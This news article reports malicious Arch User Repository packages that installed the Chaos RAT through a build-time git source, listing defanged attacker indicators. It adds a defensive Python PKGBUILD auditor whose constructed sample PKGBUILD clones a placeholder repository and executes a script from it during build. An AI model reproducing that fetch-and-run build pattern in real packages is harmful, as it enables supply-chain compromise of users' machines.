
Developers of Arch Linux discovered three malicious packages in the Arch User Repository (AUR). These packages were used to install the Chaos remote access trojan (RAT) on Linux devices.
The packages were named librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin, and were uploaded by the user danikpapas on July 16, 2025. The packages were removed from the repository two days later, after the community flagged them as malicious.

“On July 16, a malicious package was uploaded to AUR,” warn the AUR maintainers. “Two more malicious packages were uploaded by the same user a few hours later. These packages executed a script from a repository on GitHub, which was identified as a remote access Trojan (RAT).”
As with many other package repositories, there is no formal procedure for reviewing new or updated packages in the AUR. This means that users should independently review the code and installation scripts before building and installing a package.
Although the packages have now been removed, Bleeping Computer examined their archived copies. The PKGBUILD file of each package contained a source entry named patches, which pointed to a GitHub repository controlled by the attacker: https://github.com/danikpapas/zenbrowser-patch[.]git.
When the PKGBUILD is processed, this repository is cloned and treated as part of the package update and build process. However, instead of a patch, the GitHub repository contained malicious code that was executed during the build or installation phase. The repository has since been removed from GitHub, so its .git contents are no longer available for analysis.
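As an added example (not code from the article, from Arch Linux or from makepkg), the following Python script performs the kind of pre-build review the AUR maintainers recommend: it reads a PKGBUILD and flags source entries that are VCS clones fetched fresh at build time, entries whose checksum is SKIP, and fetched sources that the build functions enter or execute. The sample PKGBUILD and its repository URL are constructed placeholders modelled on the pattern described above.

```python
import re

# Constructed sample PKGBUILD modelled on the article's description: a "patches"
# source that is a git repository cloned at build time, its checksum set to SKIP,
# and its contents executed from build(). The URL is a placeholder.
SAMPLE_PKGBUILD = """\
pkgname=zen-browser-patched-bin
pkgver=1.0
source=("https://example.org/zen-browser-${pkgver}.tar.xz"
        "patches::git+https://github.com/EXAMPLE-USER/zenbrowser-patch.git")
sha256sums=('SKIP'
            'SKIP')
build() {
  cd "$srcdir/patches"
  bash ./apply.sh
}
"""

VCS_PREFIXES = ("git+", "git://", "hg+", "svn+", "bzr+", "fossil+")


def parse_array(text, name):
    """Return the elements of a bash array assignment of the form name=(...)."""
    m = re.search(r'^%s=\((.*?)\)' % re.escape(name), text, re.S | re.M)
    return [e.strip("\"'") for e in m.group(1).split()] if m else []


def audit_pkgbuild(text):
    """Return (source_name, reason) findings that deserve a manual look before building."""
    findings = []
    sources = parse_array(text, "source")
    sums = parse_array(text, "sha256sums") or parse_array(text, "b2sums")
    for i, entry in enumerate(sources):
        name, _, url = entry.rpartition("::")  # "name::url" renames the download
        name = name or url.rstrip("/").rsplit("/", 1)[-1]
        if url.startswith(VCS_PREFIXES):
            findings.append((name, "VCS source is cloned fresh at build time"))
        if i < len(sums) and sums[i].upper() == "SKIP":
            findings.append((name, "checksum is SKIP, content is not pinned"))
        # build/prepare/package bodies that cd into the fetched source will
        # typically run whatever it contains
        if re.search(r'\$\{?srcdir\}?/%s\b' % re.escape(name), text):
            findings.append((name, "build functions enter the fetched source"))
    return findings


if __name__ == "__main__":
    for src, reason in audit_pkgbuild(SAMPLE_PKGBUILD):
        print("%-12s %s" % (src, reason))
```

Run it against a real PKGBUILD by passing its text to audit_pkgbuild; an empty result is not a clean bill of health, only the absence of these particular red flags.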
The publication also notes an attempt to promote the malware on Reddit: comments recommending the malicious AUR packages were posted in reply to various Arch Linux threads. They came from an account that had been inactive for many years and was likely compromised and used to “advertise” the malware.
Arch users on Reddit immediately found the comments suspicious, uploaded one of the components to VirusTotal, and discovered Chaos RAT in it.
Chaos RAT is an open-source remote access trojan for Windows and Linux. It can upload and download files, execute commands, and open a reverse shell, giving attackers full control of the infected device.
This Trojan is often used in campaigns to distribute cryptocurrency miners, as well as for collecting credentials, stealing information, or espionage.
In this case, after installation the malware repeatedly connected to the command-and-control server 130.162[.]225[.]47:8080 and waited for commands.
“We strongly recommend that users who may have installed any of these packages remove them from their system and take necessary measures to ensure they have not been compromised,” warns the Arch Linux team.
In particular, users are advised to immediately check for a suspicious executable named systemd-initd, which may be located in the /tmp directory. If the file is found, it should be deleted.
